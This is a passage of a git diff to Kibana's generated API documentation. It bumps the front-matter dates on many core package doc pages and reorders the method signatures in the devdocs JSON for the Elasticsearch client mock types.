2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-base-browser-mocks'] --- import kbnCoreBaseBrowserMocksObj from './kbn_core_base_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_base_common.mdx b/api_docs/kbn_core_base_common.mdx index 344b327a51fa3..a5f81385f4727 100644 --- a/api_docs/kbn_core_base_common.mdx +++ b/api_docs/kbn_core_base_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-base-common title: "@kbn/core-base-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-base-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-base-common'] --- import kbnCoreBaseCommonObj from './kbn_core_base_common.devdocs.json'; diff --git a/api_docs/kbn_core_base_server_internal.mdx b/api_docs/kbn_core_base_server_internal.mdx index d97df985b2cc5..20d2872052992 100644 
--- a/api_docs/kbn_core_base_server_internal.mdx +++ b/api_docs/kbn_core_base_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-base-server-internal title: "@kbn/core-base-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-base-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-base-server-internal'] --- import kbnCoreBaseServerInternalObj from './kbn_core_base_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_base_server_mocks.mdx b/api_docs/kbn_core_base_server_mocks.mdx index c0d9ed974893e..e101e6a86dfdb 100644 --- a/api_docs/kbn_core_base_server_mocks.mdx +++ b/api_docs/kbn_core_base_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-base-server-mocks title: "@kbn/core-base-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-base-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-base-server-mocks'] --- import kbnCoreBaseServerMocksObj from './kbn_core_base_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_capabilities_common.mdx b/api_docs/kbn_core_capabilities_common.mdx index 00de3e24c0395..1f81aa2d10cb5 100644 --- a/api_docs/kbn_core_capabilities_common.mdx +++ b/api_docs/kbn_core_capabilities_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-capabilities-common title: "@kbn/core-capabilities-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-capabilities-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-capabilities-common'] --- import kbnCoreCapabilitiesCommonObj from './kbn_core_capabilities_common.devdocs.json'; 
diff --git a/api_docs/kbn_core_capabilities_server.mdx b/api_docs/kbn_core_capabilities_server.mdx index a292574afac25..bed55a52ebec9 100644 --- a/api_docs/kbn_core_capabilities_server.mdx +++ b/api_docs/kbn_core_capabilities_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-capabilities-server title: "@kbn/core-capabilities-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-capabilities-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-capabilities-server'] --- import kbnCoreCapabilitiesServerObj from './kbn_core_capabilities_server.devdocs.json'; diff --git a/api_docs/kbn_core_capabilities_server_mocks.mdx b/api_docs/kbn_core_capabilities_server_mocks.mdx index 8ac3389495849..225de5c88817e 100644 --- a/api_docs/kbn_core_capabilities_server_mocks.mdx +++ b/api_docs/kbn_core_capabilities_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-capabilities-server-mocks title: "@kbn/core-capabilities-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-capabilities-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-capabilities-server-mocks'] --- import kbnCoreCapabilitiesServerMocksObj from './kbn_core_capabilities_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_config_server_internal.mdx b/api_docs/kbn_core_config_server_internal.mdx index cb80decee13df..8d66574809afc 100644 --- a/api_docs/kbn_core_config_server_internal.mdx +++ b/api_docs/kbn_core_config_server_internal.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-config-server-internal title: "@kbn/core-config-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-config-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-config-server-internal'] --- import kbnCoreConfigServerInternalObj from './kbn_core_config_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_deprecations_browser.mdx b/api_docs/kbn_core_deprecations_browser.mdx index 8d98e0f06ef9f..586f218db8cb2 100644 --- a/api_docs/kbn_core_deprecations_browser.mdx +++ b/api_docs/kbn_core_deprecations_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-deprecations-browser title: "@kbn/core-deprecations-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-deprecations-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-deprecations-browser'] --- import kbnCoreDeprecationsBrowserObj from './kbn_core_deprecations_browser.devdocs.json'; diff --git a/api_docs/kbn_core_deprecations_browser_internal.mdx b/api_docs/kbn_core_deprecations_browser_internal.mdx index d36809d599395..c2070bd69783c 100644 --- a/api_docs/kbn_core_deprecations_browser_internal.mdx +++ b/api_docs/kbn_core_deprecations_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-deprecations-browser-internal title: "@kbn/core-deprecations-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-deprecations-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-deprecations-browser-internal'] --- import kbnCoreDeprecationsBrowserInternalObj from './kbn_core_deprecations_browser_internal.devdocs.json'; 
diff --git a/api_docs/kbn_core_deprecations_browser_mocks.mdx b/api_docs/kbn_core_deprecations_browser_mocks.mdx index 3836e2a3c4dc2..c33996b0cd08c 100644 --- a/api_docs/kbn_core_deprecations_browser_mocks.mdx +++ b/api_docs/kbn_core_deprecations_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-deprecations-browser-mocks title: "@kbn/core-deprecations-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-deprecations-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-deprecations-browser-mocks'] --- import kbnCoreDeprecationsBrowserMocksObj from './kbn_core_deprecations_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_deprecations_common.mdx b/api_docs/kbn_core_deprecations_common.mdx index c5d1188e1f972..ca14a3ee03531 100644 --- a/api_docs/kbn_core_deprecations_common.mdx +++ b/api_docs/kbn_core_deprecations_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-deprecations-common title: "@kbn/core-deprecations-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-deprecations-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-deprecations-common'] --- import kbnCoreDeprecationsCommonObj from './kbn_core_deprecations_common.devdocs.json'; diff --git a/api_docs/kbn_core_doc_links_browser.mdx b/api_docs/kbn_core_doc_links_browser.mdx index 79a06bbdf3eb4..633572d172590 100644 --- a/api_docs/kbn_core_doc_links_browser.mdx +++ b/api_docs/kbn_core_doc_links_browser.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-doc-links-browser title: "@kbn/core-doc-links-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-doc-links-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-doc-links-browser'] --- import kbnCoreDocLinksBrowserObj from './kbn_core_doc_links_browser.devdocs.json'; diff --git a/api_docs/kbn_core_doc_links_browser_mocks.mdx b/api_docs/kbn_core_doc_links_browser_mocks.mdx index 022cde2f67980..35bbc3ea97f00 100644 --- a/api_docs/kbn_core_doc_links_browser_mocks.mdx +++ b/api_docs/kbn_core_doc_links_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-doc-links-browser-mocks title: "@kbn/core-doc-links-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-doc-links-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-doc-links-browser-mocks'] --- import kbnCoreDocLinksBrowserMocksObj from './kbn_core_doc_links_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_doc_links_server.mdx b/api_docs/kbn_core_doc_links_server.mdx index 7d12c289a1e94..31017f33339e8 100644 --- a/api_docs/kbn_core_doc_links_server.mdx +++ b/api_docs/kbn_core_doc_links_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-doc-links-server title: "@kbn/core-doc-links-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-doc-links-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-doc-links-server'] --- import kbnCoreDocLinksServerObj from './kbn_core_doc_links_server.devdocs.json'; diff --git a/api_docs/kbn_core_doc_links_server_mocks.mdx b/api_docs/kbn_core_doc_links_server_mocks.mdx index d5c7d570f7f94..45b359195c1ad 100644 --- a/api_docs/kbn_core_doc_links_server_mocks.mdx 
+++ b/api_docs/kbn_core_doc_links_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-doc-links-server-mocks title: "@kbn/core-doc-links-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-doc-links-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-doc-links-server-mocks'] --- import kbnCoreDocLinksServerMocksObj from './kbn_core_doc_links_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_elasticsearch_client_server_internal.mdx b/api_docs/kbn_core_elasticsearch_client_server_internal.mdx index c5f1e5a324710..3c07c5a4b319f 100644 --- a/api_docs/kbn_core_elasticsearch_client_server_internal.mdx +++ b/api_docs/kbn_core_elasticsearch_client_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-elasticsearch-client-server-internal title: "@kbn/core-elasticsearch-client-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-elasticsearch-client-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-elasticsearch-client-server-internal'] --- import kbnCoreElasticsearchClientServerInternalObj from './kbn_core_elasticsearch_client_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_elasticsearch_client_server_mocks.devdocs.json b/api_docs/kbn_core_elasticsearch_client_server_mocks.devdocs.json index e5f0d93daf2c9..ebe913276adcb 100644 --- a/api_docs/kbn_core_elasticsearch_client_server_mocks.devdocs.json +++ b/api_docs/kbn_core_elasticsearch_client_server_mocks.devdocs.json 
@@ -225,17 +225,23 @@ "label": "asInternalUser", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.DeeplyMockedApi", - "text": "DeeplyMockedApi" + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" }, - "<", - "default", - ">; search: ", + ">, [params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined]>; delete: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -244,12 +250,12 @@ "text": "ClientApiMockInstance" }, ">, [params?: ", - "SearchRequest", + "WriteResponseBase", + ">, [params: ", + "DeleteRequest", " | ", - "SearchRequest", - " | undefined, options?: ", + "DeleteRequest", + ", options?: ", "TransportRequestOptions", " | undefined]>; cluster: ", { @@ -271,7 +277,23 @@ }, "<", "default", - ">; create: ", + ">; search: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" + }, + ">, [params?: ", + "SearchRequest", + " | ", + "SearchRequest", + " | undefined, options?: ", + "TransportRequestOptions", + " | undefined]>; create: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -307,7 +329,7 @@ }, "<", "default", - ">; index: ", + ">; name: string | symbol; index: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", 
@@ -323,22 +345,6 @@ "IndexRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; get: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ">, [params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; update: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", 
@@ -355,22 +361,6 @@ "UpdateRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; delete: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ", [params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -1223,6 +1213,16 @@ }, "<", "default", + ">; transform: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.DeeplyMockedApi", + "text": "DeeplyMockedApi" + }, + "<", + "default", ">; updateByQuery: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", 
@@ -1333,17 +1333,23 @@ "label": "asInternalUser", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.DeeplyMockedApi", - "text": "DeeplyMockedApi" + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" }, - "<", - "default", - ">; search: ", + ">, [params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined]>; delete: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -1352,12 +1358,12 @@ "text": "ClientApiMockInstance" }, ">, [params?: ", - "SearchRequest", + "WriteResponseBase", + ">, [params: ", + "DeleteRequest", " | ", - "SearchRequest", - " | undefined, options?: ", + "DeleteRequest", + ", options?: ", "TransportRequestOptions", " | undefined]>; cluster: ", { @@ -1379,7 +1385,23 @@ }, "<", "default", - ">; create: ", + ">; search: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" + }, + ">, [params?: ", + "SearchRequest", + " | ", + "SearchRequest", + " | undefined, options?: ", + "TransportRequestOptions", + " | undefined]>; create: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -1415,7 +1437,7 @@ }, "<", "default", - ">; index: ", + ">; name: string | symbol; index: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", 
@@ -1431,22 +1453,6 @@ "IndexRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; get: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ">, [params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; update: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", 
@@ -1463,22 +1469,6 @@ "UpdateRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; delete: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ", [params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -2331,6 +2321,16 @@ }, "<", "default", + ">; transform: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.DeeplyMockedApi", + "text": "DeeplyMockedApi" + }, + "<", + "default", ">; updateByQuery: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", 
@@ -2397,17 +2397,23 @@ "label": "asCurrentUser", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.DeeplyMockedApi", - "text": "DeeplyMockedApi" + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" }, - "<", - "default", - ">; search: ", + ">, [params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined]>; delete: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -2416,12 +2422,12 @@ "text": "ClientApiMockInstance" }, ">, [params?: ", - "SearchRequest", + "WriteResponseBase", + ">, [params: ", + "DeleteRequest", " | ", - "SearchRequest", - " | undefined, options?: ", + "DeleteRequest", + ", options?: ", "TransportRequestOptions", " | undefined]>; cluster: ", { @@ -2443,7 +2449,23 @@ }, "<", "default", - ">; create: ", + ">; search: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" + }, + ">, [params?: ", + "SearchRequest", + " | ", + "SearchRequest", + " | undefined, options?: ", + "TransportRequestOptions", + " | undefined]>; create: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -2479,7 +2501,7 @@ }, "<", "default", - ">; index: ", + ">; name: string | symbol; index: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", 
@@ -2495,22 +2517,6 @@ "IndexRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; get: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ">, [params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; update: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", 
@@ -2527,22 +2533,6 @@ "UpdateRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; delete: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ", [params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -3395,6 +3385,16 @@ }, "<", "default", + ">; transform: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.DeeplyMockedApi", + "text": "DeeplyMockedApi" + }, + "<", + "default", ">; updateByQuery: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", 
@@ -3526,17 +3526,23 @@ "label": "ElasticsearchClientMock", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.DeeplyMockedApi", - "text": "DeeplyMockedApi" + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" }, - "<", - "default", - ">; search: ", + ">, [params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined]>; delete: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -3545,12 +3551,12 @@ "text": "ClientApiMockInstance" }, ">, [params?: ", - "SearchRequest", + "WriteResponseBase", + ">, [params: ", + "DeleteRequest", " | ", - "SearchRequest", - " | undefined, options?: ", + "DeleteRequest", + ", options?: ", "TransportRequestOptions", " | undefined]>; cluster: ", { @@ -3572,7 +3578,23 @@ }, "<", "default", - ">; create: ", + ">; search: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" + }, + ">, [params?: ", + "SearchRequest", + " | ", + "SearchRequest", + " | undefined, options?: ", + "TransportRequestOptions", + " | undefined]>; create: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -3608,7 +3630,7 @@ }, "<", "default", - ">; index: ", + ">; name: string | symbol; index: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", 
@@ -3624,22 +3646,6 @@ "IndexRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; get: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ">, [params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; update: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", 
@@ -3656,22 +3662,6 @@ "UpdateRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; delete: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ", [params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -4524,6 +4514,16 @@ }, "<", "default", + ">; transform: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.DeeplyMockedApi", + "text": "DeeplyMockedApi" + }, + "<", + "default", ">; updateByQuery: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", 
diff --git a/api_docs/kbn_core_elasticsearch_client_server_mocks.mdx b/api_docs/kbn_core_elasticsearch_client_server_mocks.mdx index 22bf78ceaea6e..1ec4cd545d56b 100644 --- a/api_docs/kbn_core_elasticsearch_client_server_mocks.mdx +++ b/api_docs/kbn_core_elasticsearch_client_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-elasticsearch-client-server-mocks title: "@kbn/core-elasticsearch-client-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-elasticsearch-client-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-elasticsearch-client-server-mocks'] --- import kbnCoreElasticsearchClientServerMocksObj from './kbn_core_elasticsearch_client_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_elasticsearch_server.devdocs.json b/api_docs/kbn_core_elasticsearch_server.devdocs.json index 331ea6389ce5d..71b802e242b1a 100644 --- a/api_docs/kbn_core_elasticsearch_server.devdocs.json +++ b/api_docs/kbn_core_elasticsearch_server.devdocs.json 
@@ -800,7 +800,7 @@ "Headers used for authentication against Elasticsearch" ], "signature": [ - "{ from?: string | string[] | undefined; origin?: string | string[] | undefined; warning?: string | string[] | undefined; location?: string | string[] | undefined; date?: string | string[] | undefined; expires?: string | string[] | undefined; range?: string | string[] | undefined; allow?: string | string[] | undefined; accept?: string | string[] | undefined; host?: string | string[] | undefined; etag?: string | string[] | undefined; authorization?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | 